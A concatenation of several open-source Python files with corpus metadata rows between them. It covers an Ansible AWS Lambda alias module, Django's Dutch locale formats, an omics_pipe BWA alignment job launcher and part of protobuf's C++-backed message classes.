RETURN = '''
---
alias_arn:
description: Full ARN of the function, including the alias
returned: success
type: string
sample: arn:aws:lambda:us-west-2:123456789012:function:myFunction:dev
description:
description: A short description of the alias
returned: success
type: string
sample: The development stage for my hot new app
function_version:
description: The qualifier that the alias refers to
returned: success
type: string
sample: $LATEST
name:
description: The name of the alias assigned
returned: success
type: string
sample: dev
'''
class AWSConnection:
"""
Create the connection object and client objects as required.
"""
def __init__(self, ansible_obj, resources, boto3=True):
try:
self.region, self.endpoint, aws_connect_kwargs = get_aws_connection_info(ansible_obj, boto3=boto3)
self.resource_client = dict()
if not resources:
resources = ['lambda']
resources.append('iam')
for resource in resources:
aws_connect_kwargs.update(dict(region=self.region,
endpoint=self.endpoint,
conn_type='client',
resource=resource
))
self.resource_client[resource] = boto3_conn(ansible_obj, **aws_connect_kwargs)
# if region is not provided, then get default profile/session region
if not self.region:
self.region = self.resource_client['lambda'].meta.region_name
except (ClientError, ParamValidationError, MissingParametersError) as e:
ansible_obj.fail_json(msg="Unable to connect, authorize or access resource: {0}".format(e))
try:
self.account_id = self.resource_client['iam'].get_user()['User']['Arn'].split(':')[4]
except (ClientError, ValueError, KeyError, IndexError):
self.account_id = ''
def client(self, resource='lambda'):
return self.resource_client[resource]
def pc(key):
"""
Changes a python key into its Pascal case equivalent. For example, 'this_function_name' becomes 'ThisFunctionName'.
:param key:
:return:
"""
return "".join([token.capitalize() for token in key.split('_')])
def set_api_params(module, module_params):
"""
Sets module parameters to those expected by the boto3 API.
:param module:
:param module_params:
:return:
"""
api_params = dict()
for param in module_params:
module_param = module.params.get(param, None)
if module_param:
api_params[pc(param)] = module_param
return api_params
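# Rough illustration (hypothetical values, not part of the module): given
# module.params = {'function_name': 'myFunction', 'name': 'dev'}, a call such as
# set_api_params(module, ('function_name', 'name')) would return
# {'FunctionName': 'myFunction', 'Name': 'dev'} -- the Pascal-case keys boto3 expects.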
def validate_params(module, aws):
"""
Performs basic parameter validation.
:param module: Ansible module reference
:param aws: AWS client connection
:return:
"""
function_name = module.params['function_name']
# validate function name
if not re.search('^[\w\-:]+$', function_name):
module.fail_json(
msg='Function name {0} is invalid. Names must contain only alphanumeric characters, hyphens, underscores and colons.'.format(function_name)
)
if len(function_name) > 64:
module.fail_json(msg='Function name "{0}" exceeds 64 character limit'.format(function_name))
# if parameter 'function_version' is zero, set it to $LATEST, else convert it to a string
if module.params['function_version'] == 0:
module.params['function_version'] = '$LATEST'
else:
module.params['function_version'] = str(module.params['function_version'])
return
def get_lambda_alias(module, aws):
"""
Returns the lambda function alias if it exists.
:param module: Ansible module reference
:param aws: AWS client connection
:return:
"""
client = aws.client('lambda')
# set API parameters
api_params = set_api_params(module, ('function_name', 'name'))
# check if alias exists and get facts
try:
results = client.get_alias(**api_params)
except (ClientError, ParamValidationError, MissingParametersError) as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
results = None
else:
module.fail_json(msg='Error retrieving function alias: {0}'.format(e))
return results
def lambda_alias(module, aws):
"""
Adds, updates or deletes lambda function aliases.
:param module: Ansible module reference
:param aws: AWS client connection
:return dict:
"""
client = aws.client('lambda')
results = dict()
changed = False
current_state = 'absent'
state = module.params['state']
facts = get_lambda_alias(module, aws)
if facts:
current_state = 'present'
if state == 'present':
if current_state == 'present':
# check if alias has changed -- only version and description can change
alias_params = ('function_version', 'description')
for param in alias_params:
if module.params.get(param) != facts.get(pc(param)):
changed = True
break
if changed:
api_params = set_api_params(module, ('function_name', 'name'))
api_params.update(set_api_params(module, alias_params))
if not module.check_mode:
try:
results = client.update_alias(**api_params)
except (ClientError, ParamValidationError, MissingParametersError) as e:
module.fail_json(msg='Error updating function alias: {0}'.format(e))
else:
# create new function alias
api_params = set_api_params(module, ('function_name', 'name', 'function_version', 'description'))
try:
if not module.check_mode:
results = client.create_alias(**api_params)
changed = True
except (ClientError, ParamValidationError, MissingParametersError) as e:
module.fail_json(msg='Error creating function alias: {0}'.format(e))
else: # state = 'absent'
if current_state == 'present':
# delete the function
api_params = set_api_params(module, ('function_name', 'name'))
try:
if not module.check_mode:
results = client.delete_alias(**api_params)
changed = True
except (ClientError, ParamValidationError, MissingParametersError) as e:
module.fail_json(msg='Error deleting function alias: {0}'.format(e))
return dict(changed=changed, **dict(results or facts))
def main():
"""
Main entry point.
:return dict: ansible facts
"""
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
state=dict(required=False, default='present', choices=['present', 'absent']),
function_name=dict(required=True, default=None),
name=dict(required=True, default=None, aliases=['alias_name']),
function_version=dict(type='int', required=False, default=0, aliases=['version']),
description=dict(required=False, default=None),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[],
required_together=[]
)
# validate dependencies
if not HAS_BOTO3:
module.fail_json(msg='boto3 is required for this module.')
aws = AWSConnection(module, ['lambda'])
validate_params(module, aws)
results = lambda_alias(module, aws)
module.exit_json(**camel_dict_to_snake_dict(results))
# ansible import module(s) kept at ~eof as recommended
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 | -4,883,299,569,400,926,000 | 30.71875 | 130 | 0.627586 | false |
westinedu/similarinterest | django/conf/locale/nl/formats.py | 329 | 3056 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '20 januari 2009'
TIME_FORMAT = 'H:i' # '15:23'
DATETIME_FORMAT = 'j F Y H:i' # '20 januari 2009 15:23'
YEAR_MONTH_FORMAT = 'F Y' # 'januari 2009'
MONTH_DAY_FORMAT = 'j F' # '20 januari'
SHORT_DATE_FORMAT = 'j-n-Y' # '20-1-2009'
SHORT_DATETIME_FORMAT = 'j-n-Y H:i' # '20-1-2009 15:23'
FIRST_DAY_OF_WEEK = 1 # Monday (in Dutch 'maandag')
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%d-%m-%Y', '%d-%m-%y', '%Y-%m-%d', # '20-01-2009', '20-01-09', '2009-01-20'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 09'
)
TIME_INPUT_FORMATS = (
'%H:%M:%S', # '15:23:35'
'%H.%M:%S', # '15.23:35'
'%H.%M', # '15.23'
'%H:%M', # '15:23'
)
DATETIME_INPUT_FORMATS = (
# With time in %H:%M:%S :
'%d-%m-%Y %H:%M:%S', '%d-%m-%y %H:%M:%S', '%Y-%m-%d %H:%M:%S', # '20-01-2009 15:23:35', '20-01-09 15:23:35', '2009-01-20 15:23:35'
# '%d %b %Y %H:%M:%S', '%d %b %y %H:%M:%S', # '20 jan 2009 15:23:35', '20 jan 09 15:23:35'
# '%d %B %Y %H:%M:%S', '%d %B %y %H:%M:%S', # '20 januari 2009 15:23:35', '20 januari 09 15:23:35'
# With time in %H.%M:%S :
'%d-%m-%Y %H.%M:%S', '%d-%m-%y %H.%M:%S', # '20-01-2009 15.23:35', '20-01-09 15.23:35'
# '%d %b %Y %H.%M:%S', '%d %b %y %H.%M:%S', # '20 jan 2009 15.23:35', '20 jan 09 15.23:35'
# '%d %B %Y %H.%M:%S', '%d %B %y %H.%M:%S', # '20 januari 2009 15.23:35', '20 januari 09 15.23:35'
# With time in %H:%M :
'%d-%m-%Y %H:%M', '%d-%m-%y %H:%M', '%Y-%m-%d %H:%M', # '20-01-2009 15:23', '20-01-09 15:23', '2009-01-20 15:23'
# '%d %b %Y %H:%M', '%d %b %y %H:%M', # '20 jan 2009 15:23', '20 jan 09 15:23'
# '%d %B %Y %H:%M', '%d %B %y %H:%M', # '20 januari 2009 15:23', '20 januari 09 15:23'
# With time in %H.%M :
'%d-%m-%Y %H.%M', '%d-%m-%y %H.%M', # '20-01-2009 15.23', '20-01-09 15.23'
# '%d %b %Y %H.%M', '%d %b %y %H.%M', # '20 jan 2009 15.23', '20 jan 09 15.23'
# '%d %B %Y %H.%M', '%d %B %y %H.%M', # '20 januari 2009 15.23', '20 januari 09 15.23'
# Without time :
'%d-%m-%Y', '%d-%m-%y', '%Y-%m-%d', # '20-01-2009', '20-01-09', '2009-01-20'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 09'
)
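# Illustrative note (not part of Django's locale data): the *_INPUT_FORMATS entries are
# plain strptime patterns, so a value accepted here can be parsed with the standard
# library directly, e.g.:
#
#   >>> from datetime import datetime
#   >>> datetime.strptime('20-01-2009 15:23', '%d-%m-%Y %H:%M')
#   datetime.datetime(2009, 1, 20, 15, 23)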
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
| bsd-3-clause | 3,469,909,092,486,675,000 | 56.660377 | 135 | 0.453207 | false |
adammaikai/OmicsPipe2.0 | omics_pipe/modules/bwa.py | 2 | 6757 | #!/usr/bin/env python
from omics_pipe.parameters.default_parameters import default_parameters
from omics_pipe.utils import *
p = Bunch(default_parameters)
def bwa1(sample, bwa1_flag):
'''BWA aligner for read1 of paired-end reads.
input:
.fastq
output:
.sam
citation:
Li H. and Durbin R. (2009) Fast and accurate short read alignment with Burrows-Wheeler transform. Bioinformatics, 25, 1754-1760. [PMID: 19451168]
link:
http://bio-bwa.sourceforge.net/bwa.shtml
parameters from parameters file:
BWA_RESULTS:
TEMP_DIR:
SAMTOOLS_VERSION:
BWA_VERSION:
BWA_INDEX:
RAW_DATA_DIR:
GATK_READ_GROUP_INFO:
COMPRESSION:
'''
SAMPLE1 = sample + "_1"
spawn_job(jobname = 'bwa1', SAMPLE = SAMPLE1, LOG_PATH = p.LOG_PATH, RESULTS_EMAIL = p.RESULTS_EMAIL, SCHEDULER = p.SCHEDULER, walltime = "240:00:00", queue = p.QUEUE, nodes = 1, ppn = 30, memory = "30gb", script = "/bwa_drmaa_RNA.sh", args_list = [p.BWA_RESULTS, p.TEMP_DIR, p.SAMTOOLS_VERSION, p.BWA_VERSION, p.BWA_INDEX, SAMPLE1, p.RAW_DATA_DIR, p.GATK_READ_GROUP_INFO, p.COMPRESSION])
job_status(jobname = 'bwa1', resultspath = p.BWA_RESULTS, SAMPLE = sample, outputfilename = SAMPLE1 + "/" + SAMPLE1 + ".sam", FLAG_PATH = p.FLAG_PATH)
return
def bwa2(sample, bwa2_flag):
'''BWA aligner for read2 of paired-end reads.
input:
.fastq
output:
.sam
citation:
Li H. and Durbin R. (2009) Fast and accurate short read alignment with Burrows-Wheeler transform. Bioinformatics, 25, 1754-1760. [PMID: 19451168]
link:
http://bio-bwa.sourceforge.net/bwa.shtml
parameters from parameters file:
BWA_RESULTS:
TEMP_DIR:
SAMTOOLS_VERSION:
BWA_VERSION:
BWA_INDEX:
RAW_DATA_DIR:
GATK_READ_GROUP_INFO:
COMPRESSION:
'''
SAMPLE2 = sample + "_2"
spawn_job(jobname = 'bwa2', SAMPLE = SAMPLE2, LOG_PATH = p.LOG_PATH, RESULTS_EMAIL = p.RESULTS_EMAIL, SCHEDULER = p.SCHEDULER, walltime = "240:00:00", queue = p.QUEUE, nodes = 1, ppn = 30, memory = "30gb", script = "/bwa_drmaa_RNA.sh", args_list = [p.BWA_RESULTS, p.TEMP_DIR, p.SAMTOOLS_VERSION, p.BWA_VERSION, p.BWA_INDEX, SAMPLE2, p.RAW_DATA_DIR, p.GATK_READ_GROUP_INFO, p.COMPRESSION])
job_status(jobname = 'bwa2', resultspath = p.BWA_RESULTS, SAMPLE = sample, outputfilename = SAMPLE2 + "/" + SAMPLE2 + ".sam", FLAG_PATH = p.FLAG_PATH)
return
def bwa_RNA(sample, bwa_flag):
'''BWA aligner for single end reads.
input:
.fastq
output:
.sam
citation:
Li H. and Durbin R. (2009) Fast and accurate short read alignment with Burrows-Wheeler transform. Bioinformatics, 25, 1754-1760. [PMID: 19451168]
link:
http://bio-bwa.sourceforge.net/bwa.shtml
parameters from parameters file:
BWA_RESULTS:
TEMP_DIR:
SAMTOOLS_VERSION:
BWA_VERSION:
BWA_INDEX:
RAW_DATA_DIR:
GATK_READ_GROUP_INFO:
COMPRESSION:
'''
spawn_job(jobname = 'bwa', SAMPLE = sample, LOG_PATH = p.LOG_PATH, RESULTS_EMAIL = p.RESULTS_EMAIL, SCHEDULER = p.SCHEDULER, walltime = "240:00:00", queue = p.QUEUE, nodes = 1, ppn = 30, memory = "30gb", script = "/bwa_drmaa_RNA.sh", args_list = [p.BWA_RESULTS, p.TEMP_DIR, p.SAMTOOLS_VERSION, p.BWA_VERSION, p.BWA_INDEX, sample, p.RAW_DATA_DIR, p.GATK_READ_GROUP_INFO, p.COMPRESSION])
job_status(jobname = 'bwa', resultspath = p.BWA_RESULTS, SAMPLE = sample, outputfilename = sample + "/" + sample + ".sam", FLAG_PATH = p.FLAG_PATH)
return
def bwa_mem(sample,bwa_mem_flag):
'''BWA aligner with BWA-MEM algorithm.
input:
.fastq
output:
.sam
citation:
Li H. and Durbin R. (2009) Fast and accurate short read alignment with Burrows-Wheeler transform. Bioinformatics, 25, 1754-1760. [PMID: 19451168]
link:
http://bio-bwa.sourceforge.net/bwa.shtml
parameters from parameters file:
BWA_RESULTS:
TEMP_DIR:
SAMTOOLS_VERSION:
BWA_VERSION:
GENOME:
RAW_DATA_DIR:
BWA_OPTIONS:
COMPRESSION:
'''
spawn_job(jobname = 'bwa_mem', SAMPLE = sample, LOG_PATH = p.LOG_PATH, RESULTS_EMAIL = p.RESULTS_EMAIL, SCHEDULER = p.SCHEDULER, walltime = "240:00:00", queue = p.QUEUE, nodes = 1, ppn = 30, memory = "30gb", script = "/bwa_drmaa_" + p.ENDS + "_DNA.sh", args_list = [p.BWA_RESULTS, p.TEMP_DIR, p.SAMTOOLS_VERSION, p.BWA_VERSION, p.BWA_INDEX, sample, p.RAW_DATA_DIR, p.BWA_OPTIONS, p.COMPRESSION])
job_status(jobname = 'bwa_mem', resultspath = p.BWA_RESULTS, SAMPLE = sample, outputfilename = sample + "/" + sample + "_sorted.bam", FLAG_PATH = p.FLAG_PATH)
return
def bwa_mem_pipe(sample,bwa_mem_pipe_flag):
'''BWA aligner with BWA-MEM algorithm.
input:
.fastq
output:
.sam
citation:
Li H. and Durbin R. (2009) Fast and accurate short read alignment with Burrows-Wheeler transform. Bioinformatics, 25, 1754-1760. [PMID: 19451168]
link:
http://bio-bwa.sourceforge.net/bwa.shtml
parameters from parameters file:
BWA_RESULTS:
TEMP_DIR:
SAMTOOLS_VERSION:
BWA_VERSION:
GENOME:
RAW_DATA_DIR:
BWA_OPTIONS:
COMPRESSION:
SAMBAMBA_VERSION:
SAMBLASTER_VERSION:
SAMBAMBA_OPTIONS:
'''
spawn_job(jobname = 'bwa_mem_pipe', SAMPLE = sample, LOG_PATH = p.LOG_PATH, RESULTS_EMAIL = p.RESULTS_EMAIL, SCHEDULER = p.SCHEDULER, walltime = "240:00:00", queue = p.QUEUE, nodes = 1, ppn = 30, memory = "30gb", script = "/bwa_drmaa_" + p.ENDS + "_DNA_piped.sh", args_list = [p.BWA_RESULTS, p.TEMP_DIR, p.SAMTOOLS_VERSION, p.BWA_VERSION, p.BWA_INDEX, sample, p.RAW_DATA_DIR, p.BWA_OPTIONS, p.COMPRESSION, p.SAMBAMBA_VERSION, p.SAMBLASTER_VERSION, p.SAMBAMBA_OPTIONS])
job_status(jobname = 'bwa_mem_pipe', resultspath = p.BWA_RESULTS, SAMPLE = sample, outputfilename = sample + "/" + sample + "_sorted.bam", FLAG_PATH = p.FLAG_PATH)
return
#(resultspath + "/" + outputfilename)
if __name__ == '__main__':
bwa1(sample, bwa1_flag)
bwa2(sample, bwa2_flag)
bwa_RNA(sample, bwa_flag)
bwa_mem(sample,bwa_mem_flag)
bwa_mem_pipe(sample, bwa_mem_pipe_flag)
sys.exit(0)
| mit | -625,956,713,378,143,400 | 35.327957 | 472 | 0.593755 | false |
Rafiot/botchallenge | client/google/protobuf/internal/cpp_message.py | 2 | 23568 | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# http://code.google.com/p/protobuf/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains helper functions used to create protocol message classes from
Descriptor objects at runtime backed by the protocol buffer C++ API.
"""
__author__ = '[email protected] (Petar Petrov)'
import copyreg
import operator
from google.protobuf.internal import _net_proto2___python
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import message
import collections
_LABEL_REPEATED = _net_proto2___python.LABEL_REPEATED
_LABEL_OPTIONAL = _net_proto2___python.LABEL_OPTIONAL
_CPPTYPE_MESSAGE = _net_proto2___python.CPPTYPE_MESSAGE
_TYPE_MESSAGE = _net_proto2___python.TYPE_MESSAGE
def GetDescriptorPool():
"""Creates a new DescriptorPool C++ object."""
return _net_proto2___python.NewCDescriptorPool()
_pool = GetDescriptorPool()
def GetFieldDescriptor(full_field_name):
"""Searches for a field descriptor given a full field name."""
return _pool.FindFieldByName(full_field_name)
def BuildFile(content):
"""Registers a new proto file in the underlying C++ descriptor pool."""
_net_proto2___python.BuildFile(content)
def GetExtensionDescriptor(full_extension_name):
"""Searches for extension descriptor given a full field name."""
return _pool.FindExtensionByName(full_extension_name)
def NewCMessage(full_message_name):
"""Creates a new C++ protocol message by its name."""
return _net_proto2___python.NewCMessage(full_message_name)
def ScalarProperty(cdescriptor):
"""Returns a scalar property for the given descriptor."""
def Getter(self):
return self._cmsg.GetScalar(cdescriptor)
def Setter(self, value):
self._cmsg.SetScalar(cdescriptor, value)
return property(Getter, Setter)
def CompositeProperty(cdescriptor, message_type):
"""Returns a Python property the given composite field."""
def Getter(self):
sub_message = self._composite_fields.get(cdescriptor.name, None)
if sub_message is None:
cmessage = self._cmsg.NewSubMessage(cdescriptor)
sub_message = message_type._concrete_class(__cmessage=cmessage)
self._composite_fields[cdescriptor.name] = sub_message
return sub_message
return property(Getter)
class RepeatedScalarContainer(object):
"""Container for repeated scalar fields."""
__slots__ = ['_message', '_cfield_descriptor', '_cmsg']
def __init__(self, msg, cfield_descriptor):
self._message = msg
self._cmsg = msg._cmsg
self._cfield_descriptor = cfield_descriptor
def append(self, value):
self._cmsg.AddRepeatedScalar(
self._cfield_descriptor, value)
def extend(self, sequence):
for element in sequence:
self.append(element)
def insert(self, key, value):
values = self[slice(None, None, None)]
values.insert(key, value)
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def remove(self, value):
values = self[slice(None, None, None)]
values.remove(value)
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def __setitem__(self, key, value):
values = self[slice(None, None, None)]
values[key] = value
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def __getitem__(self, key):
return self._cmsg.GetRepeatedScalar(self._cfield_descriptor, key)
def __delitem__(self, key):
self._cmsg.DeleteRepeatedField(self._cfield_descriptor, key)
def __len__(self):
return len(self[slice(None, None, None)])
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, collections.Sequence):
raise TypeError(
'Can only compare repeated scalar fields against sequences.')
# We are presumably comparing against some other sequence type.
return other == self[slice(None, None, None)]
def __ne__(self, other):
return not self == other
def __hash__(self):
raise TypeError('unhashable object')
def sort(self, *args, **kwargs):
# Maintain compatibility with the previous interface.
if 'sort_function' in kwargs:
kwargs['cmp'] = kwargs.pop('sort_function')
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor,
sorted(self, *args, **kwargs))
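# Rough usage sketch (the message class and field names are hypothetical): for a
# generated message 'msg' with a repeated scalar field 'values', the property created
# below hands back one of these containers, so the usual list-like calls apply:
#
#   msg.values.append(1)
#   msg.values.extend([2, 3])
#   msg.values[:]        # -> [1, 2, 3]
#   len(msg.values)      # -> 3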
def RepeatedScalarProperty(cdescriptor):
"""Returns a Python property the given repeated scalar field."""
def Getter(self):
container = self._composite_fields.get(cdescriptor.name, None)
if container is None:
container = RepeatedScalarContainer(self, cdescriptor)
self._composite_fields[cdescriptor.name] = container
return container
def Setter(self, new_value):
raise AttributeError('Assignment not allowed to repeated field '
'"%s" in protocol message object.' % cdescriptor.name)
doc = 'Magic attribute generated for "%s" proto field.' % cdescriptor.name
return property(Getter, Setter, doc=doc)
class RepeatedCompositeContainer(object):
"""Container for repeated composite fields."""
__slots__ = ['_message', '_subclass', '_cfield_descriptor', '_cmsg']
def __init__(self, msg, cfield_descriptor, subclass):
self._message = msg
self._cmsg = msg._cmsg
self._subclass = subclass
self._cfield_descriptor = cfield_descriptor
def add(self, **kwargs):
cmessage = self._cmsg.AddMessage(self._cfield_descriptor)
return self._subclass(__cmessage=cmessage, __owner=self._message, **kwargs)
def extend(self, elem_seq):
"""Extends by appending the given sequence of elements of the same type
as this one, copying each individual message.
"""
for message in elem_seq:
self.add().MergeFrom(message)
def remove(self, value):
# TODO(protocol-devel): This is inefficient as it needs to generate a
# message pointer for each message only to do index(). Move this to a C++
# extension function.
self.__delitem__(self[slice(None, None, None)].index(value))
def MergeFrom(self, other):
for message in other[:]:
self.add().MergeFrom(message)
def __getitem__(self, key):
cmessages = self._cmsg.GetRepeatedMessage(
self._cfield_descriptor, key)
subclass = self._subclass
if not isinstance(cmessages, list):
return subclass(__cmessage=cmessages, __owner=self._message)
return [subclass(__cmessage=m, __owner=self._message) for m in cmessages]
def __delitem__(self, key):
self._cmsg.DeleteRepeatedField(
self._cfield_descriptor, key)
def __len__(self):
return self._cmsg.FieldLength(self._cfield_descriptor)
def __eq__(self, other):
"""Compares the current instance with another one."""
if self is other:
return True
if not isinstance(other, self.__class__):
raise TypeError('Can only compare repeated composite fields against '
'other repeated composite fields.')
messages = self[slice(None, None, None)]
other_messages = other[slice(None, None, None)]
return messages == other_messages
def __hash__(self):
raise TypeError('unhashable object')
def sort(self, cmp=None, key=None, reverse=False, **kwargs):
# Maintain compatibility with the old interface.
if cmp is None and 'sort_function' in kwargs:
cmp = kwargs.pop('sort_function')
# The cmp function, if provided, is passed the results of the key function,
# so we only need to wrap one of them.
if key is None:
index_key = self.__getitem__
else:
index_key = lambda i: key(self[i])
# Sort the list of current indexes by the underlying object.
indexes = list(range(len(self)))
indexes.sort(cmp=cmp, key=index_key, reverse=reverse)
# Apply the transposition.
for dest, src in enumerate(indexes):
if dest == src:
continue
self._cmsg.SwapRepeatedFieldElements(self._cfield_descriptor, dest, src)
# Don't swap the same value twice.
indexes[src] = src
def RepeatedCompositeProperty(cdescriptor, message_type):
"""Returns a Python property for the given repeated composite field."""
def Getter(self):
container = self._composite_fields.get(cdescriptor.name, None)
if container is None:
container = RepeatedCompositeContainer(
self, cdescriptor, message_type._concrete_class)
self._composite_fields[cdescriptor.name] = container
return container
def Setter(self, new_value):
raise AttributeError('Assignment not allowed to repeated field '
'"%s" in protocol message object.' % cdescriptor.name)
doc = 'Magic attribute generated for "%s" proto field.' % cdescriptor.name
return property(Getter, Setter, doc=doc)
class ExtensionDict(object):
"""Extension dictionary added to each protocol message."""
def __init__(self, msg):
self._message = msg
self._cmsg = msg._cmsg
self._values = {}
def __setitem__(self, extension, value):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_OPTIONAL or
cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
raise TypeError('Extension %r is repeated and/or a composite type.' % (
extension.full_name,))
self._cmsg.SetScalar(cdescriptor, value)
self._values[extension] = value
def __getitem__(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_REPEATED and
cdescriptor.cpp_type != _CPPTYPE_MESSAGE):
return self._cmsg.GetScalar(cdescriptor)
ext = self._values.get(extension, None)
if ext is not None:
return ext
ext = self._CreateNewHandle(extension)
self._values[extension] = ext
return ext
def ClearExtension(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
self._cmsg.ClearFieldByDescriptor(extension._cdescriptor)
if extension in self._values:
del self._values[extension]
def HasExtension(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
return self._cmsg.HasFieldByDescriptor(extension._cdescriptor)
def _FindExtensionByName(self, name):
"""Tries to find a known extension with the specified name.
Args:
name: Extension full name.
Returns:
Extension field descriptor.
"""
return self._message._extensions_by_name.get(name, None)
def _CreateNewHandle(self, extension):
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_REPEATED and
cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
cmessage = self._cmsg.NewSubMessage(cdescriptor)
return extension.message_type._concrete_class(__cmessage=cmessage)
if cdescriptor.label == _LABEL_REPEATED:
if cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
return RepeatedCompositeContainer(
self._message, cdescriptor, extension.message_type._concrete_class)
else:
return RepeatedScalarContainer(self._message, cdescriptor)
# This shouldn't happen!
assert False
return None
def NewMessage(bases, message_descriptor, dictionary):
"""Creates a new protocol message *class*."""
_AddClassAttributesForNestedExtensions(message_descriptor, dictionary)
_AddEnumValues(message_descriptor, dictionary)
_AddDescriptors(message_descriptor, dictionary)
return bases
def InitMessage(message_descriptor, cls):
"""Constructs a new message instance (called before instance's __init__)."""
cls._extensions_by_name = {}
_AddInitMethod(message_descriptor, cls)
_AddMessageMethods(message_descriptor, cls)
_AddPropertiesForExtensions(message_descriptor, cls)
copyreg.pickle(cls, lambda obj: (cls, (), obj.__getstate__()))
def _AddDescriptors(message_descriptor, dictionary):
"""Sets up a new protocol message class dictionary.
Args:
message_descriptor: A Descriptor instance describing this message type.
dictionary: Class dictionary to which we'll add a '__slots__' entry.
"""
dictionary['__descriptors'] = {}
for field in message_descriptor.fields:
dictionary['__descriptors'][field.name] = GetFieldDescriptor(
field.full_name)
dictionary['__slots__'] = list(dictionary['__descriptors'].keys()) + [
'_cmsg', '_owner', '_composite_fields', 'Extensions', '_HACK_REFCOUNTS']
def _AddEnumValues(message_descriptor, dictionary):
"""Sets class-level attributes for all enum fields defined in this message.
Args:
message_descriptor: Descriptor object for this message type.
dictionary: Class dictionary that should be populated.
"""
for enum_type in message_descriptor.enum_types:
dictionary[enum_type.name] = enum_type_wrapper.EnumTypeWrapper(enum_type)
for enum_value in enum_type.values:
dictionary[enum_value.name] = enum_value.number
def _AddClassAttributesForNestedExtensions(message_descriptor, dictionary):
"""Adds class attributes for the nested extensions."""
extension_dict = message_descriptor.extensions_by_name
for extension_name, extension_field in list(extension_dict.items()):
assert extension_name not in dictionary
dictionary[extension_name] = extension_field
def _AddInitMethod(message_descriptor, cls):
"""Adds an __init__ method to cls."""
# Create and attach message field properties to the message class.
# This can be done just once per message class, since property setters and
# getters are passed the message instance.
# This makes message instantiation extremely fast, and at the same time it
# doesn't require the creation of property objects for each message instance,
# which saves a lot of memory.
for field in message_descriptor.fields:
field_cdescriptor = cls.__descriptors[field.name]
if field.label == _LABEL_REPEATED:
if field.cpp_type == _CPPTYPE_MESSAGE:
value = RepeatedCompositeProperty(field_cdescriptor, field.message_type)
else:
value = RepeatedScalarProperty(field_cdescriptor)
elif field.cpp_type == _CPPTYPE_MESSAGE:
value = CompositeProperty(field_cdescriptor, field.message_type)
else:
value = ScalarProperty(field_cdescriptor)
setattr(cls, field.name, value)
# Attach a constant with the field number.
constant_name = field.name.upper() + '_FIELD_NUMBER'
setattr(cls, constant_name, field.number)
def Init(self, **kwargs):
"""Message constructor."""
cmessage = kwargs.pop('__cmessage', None)
if cmessage:
self._cmsg = cmessage
else:
self._cmsg = NewCMessage(message_descriptor.full_name)
# Keep a reference to the owner, as the owner keeps a reference to the
# underlying protocol buffer message.
owner = kwargs.pop('__owner', None)
if owner:
self._owner = owner
if message_descriptor.is_extendable:
self.Extensions = ExtensionDict(self)
else:
# Reference counting in the C++ code is broken and depends on
# the Extensions reference to keep this object alive during unit
# tests (see b/4856052). Remove this once b/4945904 is fixed.
self._HACK_REFCOUNTS = self
self._composite_fields = {}
